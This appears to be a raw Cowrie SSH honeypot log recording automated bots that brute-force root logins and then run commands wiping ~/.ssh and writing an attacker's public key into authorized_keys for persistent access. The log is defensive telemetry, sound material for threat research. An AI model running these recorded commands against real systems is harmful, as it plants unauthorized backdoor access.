{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:28:12.786029Z","src_ip":"36.89.28.139","session":"4d12b6ab56b1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:28:14.212560Z","src_ip":"36.89.28.139","session":"4d12b6ab56b1"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:14.418305Z","src_ip":"36.89.28.139","session":"7ab961b6156b"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:14.419555Z","src_ip":"36.89.28.139","session":"4d12b6ab56b1"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":45540,"dst_ip":"1.2.3.4","dst_port":22,"session":"96fba4e9a625","protocol":"ssh","message":"New connection: 45.159.112.103:45540 (1.2.3.4:22) [session: 96fba4e9a625]","sensor":"my-vps","timestamp":"2025-08-26T00:28:23.206173Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:28:23.207175Z","src_ip":"45.159.112.103","session":"96fba4e9a625"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:28:23.321814Z","src_ip":"45.159.112.103","session":"96fba4e9a625"}
{"eventid":"cowrie.login.success","username":"root","password":"viktor","message":"login attempt [root/viktor] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:28:23.819628Z","src_ip":"45.159.112.103","session":"96fba4e9a625"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:28:24.098402Z","src_ip":"45.159.112.103","session":"96fba4e9a625"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:28:24.099097Z","src_ip":"45.159.112.103","session":"96fba4e9a625"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:28:24.100200Z","src_ip":"45.159.112.103","session":"96fba4e9a625"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:24.215502Z","src_ip":"45.159.112.103","session":"96fba4e9a625"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:28:24.495317Z","src_ip":"45.159.112.103","session":"96fba4e9a625"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:28:24.495980Z","src_ip":"45.159.112.103","session":"96fba4e9a625"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:28:24.612628Z","src_ip":"45.159.112.103","session":"96fba4e9a625"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:24.613468Z","src_ip":"45.159.112.103","session":"96fba4e9a625"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":45542,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f6afd84ef64","protocol":"ssh","message":"New connection: 45.159.112.103:45542 (1.2.3.4:22) [session: 0f6afd84ef64]","sensor":"my-vps","timestamp":"2025-08-26T00:28:24.722320Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:28:24.723094Z","src_ip":"45.159.112.103","session":"0f6afd84ef64"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:28:24.835086Z","src_ip":"45.159.112.103","session":"0f6afd84ef64"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:28:25.325300Z","src_ip":"45.159.112.103","session":"0f6afd84ef64"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:26.440083Z","src_ip":"45.159.112.103","session":"0f6afd84ef64"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":45544,"dst_ip":"1.2.3.4","dst_port":22,"session":"e6bb8f7b3ac5","protocol":"ssh","message":"New connection: 45.159.112.103:45544 (1.2.3.4:22) [session: e6bb8f7b3ac5]","sensor":"my-vps","timestamp":"2025-08-26T00:28:26.539082Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:28:26.540103Z","src_ip":"45.159.112.103","session":"e6bb8f7b3ac5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:28:26.645806Z","src_ip":"45.159.112.103","session":"e6bb8f7b3ac5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:28:27.109067Z","src_ip":"45.159.112.103","session":"e6bb8f7b3ac5"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:27.216611Z","src_ip":"45.159.112.103","session":"e6bb8f7b3ac5"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:27.223809Z","src_ip":"45.159.112.103","session":"96fba4e9a625"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":60632,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbcddf53fe8b","protocol":"ssh","message":"New connection: 27.112.78.245:60632 (1.2.3.4:22) [session: dbcddf53fe8b]","sensor":"my-vps","timestamp":"2025-08-26T00:28:30.350286Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:28:30.351095Z","src_ip":"27.112.78.245","session":"dbcddf53fe8b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:28:30.612021Z","src_ip":"27.112.78.245","session":"dbcddf53fe8b"}
{"eventid":"cowrie.login.success","username":"root","password":"12369874","message":"login attempt [root/12369874] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:28:31.783526Z","src_ip":"27.112.78.245","session":"dbcddf53fe8b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:28:32.330642Z","src_ip":"27.112.78.245","session":"dbcddf53fe8b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:28:32.331483Z","src_ip":"27.112.78.245","session":"dbcddf53fe8b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:28:32.332595Z","src_ip":"27.112.78.245","session":"dbcddf53fe8b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:32.594587Z","src_ip":"27.112.78.245","session":"dbcddf53fe8b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:28:33.216559Z","src_ip":"27.112.78.245","session":"dbcddf53fe8b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:28:33.217422Z","src_ip":"27.112.78.245","session":"dbcddf53fe8b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:28:33.480399Z","src_ip":"27.112.78.245","session":"dbcddf53fe8b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:33.481254Z","src_ip":"27.112.78.245","session":"dbcddf53fe8b"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":60646,"dst_ip":"1.2.3.4","dst_port":22,"session":"e687e541b690","protocol":"ssh","message":"New connection: 27.112.78.245:60646 (1.2.3.4:22) [session: e687e541b690]","sensor":"my-vps","timestamp":"2025-08-26T00:28:33.745613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:28:33.746205Z","src_ip":"27.112.78.245","session":"e687e541b690"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:28:34.010341Z","src_ip":"27.112.78.245","session":"e687e541b690"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:28:35.105695Z","src_ip":"27.112.78.245","session":"e687e541b690"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:36.372996Z","src_ip":"27.112.78.245","session":"e687e541b690"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":44390,"dst_ip":"1.2.3.4","dst_port":22,"session":"a03396bead42","protocol":"ssh","message":"New connection: 27.112.78.245:44390 (1.2.3.4:22) [session: a03396bead42]","sensor":"my-vps","timestamp":"2025-08-26T00:28:36.640963Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:28:36.641723Z","src_ip":"27.112.78.245","session":"a03396bead42"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:28:36.906926Z","src_ip":"27.112.78.245","session":"a03396bead42"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:28:38.019456Z","src_ip":"27.112.78.245","session":"a03396bead42"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:38.286732Z","src_ip":"27.112.78.245","session":"a03396bead42"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:28:38.287657Z","src_ip":"27.112.78.245","session":"dbcddf53fe8b"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":47394,"dst_ip":"1.2.3.4","dst_port":22,"session":"189afaf7c205","protocol":"ssh","message":"New connection: 24.108.102.132:47394 (1.2.3.4:22) [session: 189afaf7c205]","sensor":"my-vps","timestamp":"2025-08-26T00:28:41.148356Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:28:41.159157Z","src_ip":"24.108.102.132","session":"189afaf7c205"}
